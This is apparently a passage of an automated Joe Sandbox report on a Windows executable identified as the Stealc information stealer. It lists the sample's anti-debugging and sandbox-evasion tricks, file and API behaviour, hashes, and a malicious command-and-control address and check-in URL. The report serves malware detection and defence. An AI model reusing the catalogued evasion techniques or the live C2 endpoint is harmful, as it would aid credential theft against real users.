                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DB1F9 second address: 13DB203 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FF674E409B6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DB435 second address: 13DB439 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DB439 second address: 13DB44A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007FF674E409B6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DB44A second address: 13DB4A9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF6744C8C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b nop 0x0000000c jc 00007FF6744C8CA2h 0x00000012 jne 00007FF6744C8C9Ch 0x00000018 push dword ptr [ebp+1244749Bh] 0x0000001e call 00007FF6744C8CA4h 0x00000023 call 00007FF6744C8C9Eh 0x00000028 mov dx, FA32h 0x0000002c pop edx 0x0000002d pop edx 0x0000002e push 0D4E84F9h 0x00000033 push eax 0x00000034 push edx 0x00000035 jnc 00007FF6744C8C9Ch 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DE39E second address: 13DE3AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 je 00007FF674E409B6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DE3AD second address: 13DE3D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6744C8CA3h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 je 00007FF6744C8C96h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DE3D2 second address: 13DE3ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FF674E409C2h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DFD88 second address: 13DFD9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FF6744C8C9Ah 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C6027F second address: 4C602C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF674E409C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FF674E409BEh 0x0000000f push eax 0x00000010 jmp 00007FF674E409BBh 0x00000015 xchg eax, ebp 0x00000016 pushad 0x00000017 mov edx, eax 0x00000019 push eax 0x0000001a mov bl, 0Bh 0x0000001c pop ecx 0x0000001d popad 0x0000001e mov ebp, esp 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 mov ax, CBA7h 0x00000027 mov al, 7Bh 0x00000029 popad 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C6035B second address: 4C6036A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF6744C8C9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C6036A second address: 4C60370 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60370 second address: 4C60374 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4C60374 second address: 4C60378 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 1161AC6 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F138B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00F138B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F14910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00F14910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F0DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00F0DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F0E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00F0E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F14570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00F14570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F0ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00F0ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00F016D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F0F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00F0F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F13EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00F13EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F0F68A FindFirstFileA,0_2_00F0F68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F0BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00F0BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F0DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00F0DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F01160 GetSystemInfo,ExitProcess,0_2_00F01160
                Source: file.exe, file.exe, 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2091004955.00000000008D2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8
                Source: file.exe, 00000000.00000002.2091004955.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2091004955.0000000000903000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2091004955.000000000088E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13627
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13624
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13638
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13678
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13645
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F045C0 VirtualProtect ?,00000004,00000100,000000000_2_00F045C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F19860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00F19860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F19750 mov eax, dword ptr fs:[00000030h]0_2_00F19750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F178E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_00F178E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 1164, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F19600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00F19600
                Source: file.exe, file.exe, 00000000.00000002.2091443087.00000000012DB000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 7FProgram Manager
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00F17B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F17980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00F17980
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F17850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00F17850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F17A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00F17A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.f00000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2091004955.000000000088E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2050199522.0000000004AF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 1164, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.f00000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.2091263076.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2091004955.000000000088E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.2050199522.0000000004AF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 1164, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.37file.exe, 00000000.00000002.2091004955.000000000088E000.00000004.00000020.00020000.00000000.sdmptrue
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/wsfile.exe, 00000000.00000002.2091004955.00000000008E6000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37/e2b1563c6670f193.phpTWfile.exe, 00000000.00000002.2091004955.00000000008E6000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    http://185.215.113.37/e2b1563c6670f193.phpxvfile.exe, 00000000.00000002.2091004955.00000000008E6000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      185.215.113.37
                      		unknownPortugal
                      		206894WHOLESALECONNECTIONSNLtrue

                      General Information

                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1524420
                      Start date and time:2024-10-02 19:07:02 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 3m 0s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:2
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:file.exe
                      Detection:MAL
                      Classification:mal100.troj.evad.winEXE@1/0@0/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 80%
                      • Number of executed functions: 19
                      • Number of non-executed functions: 85
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Stop behavior analysis, all processes terminated

                      Warnings

                      • Exclude process from analysis (whitelisted): dllhost.exe
                      • VT rate limit hit for: file.exe

                      Simulations

                      Behavior and APIs

                      No simulations

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      185.215.113.37file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37/e2b1563c6670f193.php
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37/e2b1563c6670f193.php

                      Domains

                      No context

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealcBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37
                      file.exeGet hashmaliciousStealc, VidarBrowse
                      • 185.215.113.37

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      No created / dropped files found

                      Static File Info

                      General

                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):7.951210825311078
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:file.exe
                      File size:1'793'024 bytes
                      MD5:9267e551326d9f70ca969543647f060b
                      SHA1:19a3f3bff029fb895b5d256d6d6a4cce1e5d8a85
                      SHA256:4ffb89ed6560f1f1e8c683cd4451982c9588cf8ac2846f652ba88e611dc639bd
                      SHA512:f90265f584d3ba3c0974d8c8a0968085a4716c8ca8251b858e33de0abfdba5acb37b0ffca3ff2c44fce1150b58eac1ed688a2d731bd84fd850785ea5424afb2d
                      SSDEEP:49152:OLXUAVXAcRNdrKXz/yDqffgb8sa0pQspR+MFVJYWz:UXFduXzI/ndQspRDFx
                      TLSH:0D853376B80EB76BC291C174CE769934F16DBC81E3E5D67B4E99112FCA6212CB023724
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                      File Icon

                      Icon Hash:00928e8e8686b000

                      Static PE Info

                      General

                      Entrypoint:0xa7a000
                      Entrypoint Section:.taggant
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                      Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:5
                      OS Version Minor:1
                      File Version Major:5
                      File Version Minor:1
                      Subsystem Version Major:5
                      Subsystem Version Minor:1
                      Import Hash:2eabe9054cad5152567f0699947a2c5b

                      Entrypoint Preview

                      Instruction
                      jmp 00007FF67468F39Ah

                      Rich Headers

                      Programming Language:
                      • [C++] VS2010 build 30319
                      • [ASM] VS2010 build 30319
                      • [ C ] VS2010 build 30319
                      • [ C ] VS2008 SP1 build 30729
                      • [IMP] VS2008 SP1 build 30729
                      • [LNK] VS2010 build 30319

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      0x10000x25b0000x228008ee9cda0e4db25714f4b473fa9fa73d7unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      0x25e0000x28b0000x200a95af7bbc0bb0cb5cc177a725842c373unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      xmtfkgun0x4e90000x1900000x18fa00b400b52569a4960d20957559e9e089eeFalse0.9947668224116359data7.9523327915554285IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      toxpwvxv0x6790000x10000x400a355c09c6e725b877d0caaff3e3e1a8dFalse0.78125data6.065996624503552IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .taggant0x67a0000x30000x2200ba9d3e1c5df24907580f67261531556eFalse0.40441176470588236DOS executable (COM)4.2619491113454355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                      Imports

                      DLLImport
                      kernel32.dlllstrcpy

                      Network Behavior

                      Suricata IDS Alerts

                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                      2024-10-02T19:07:57.397568+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.549704185.215.113.3780TCP

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Oct 2, 2024 19:07:56.475563049 CEST4970480192.168.2.5185.215.113.37
                      Oct 2, 2024 19:07:56.480578899 CEST8049704185.215.113.37192.168.2.5
                      Oct 2, 2024 19:07:56.480724096 CEST4970480192.168.2.5185.215.113.37
                      Oct 2, 2024 19:07:56.480946064 CEST4970480192.168.2.5185.215.113.37
                      Oct 2, 2024 19:07:56.485995054 CEST8049704185.215.113.37192.168.2.5
                      Oct 2, 2024 19:07:57.169059992 CEST8049704185.215.113.37192.168.2.5
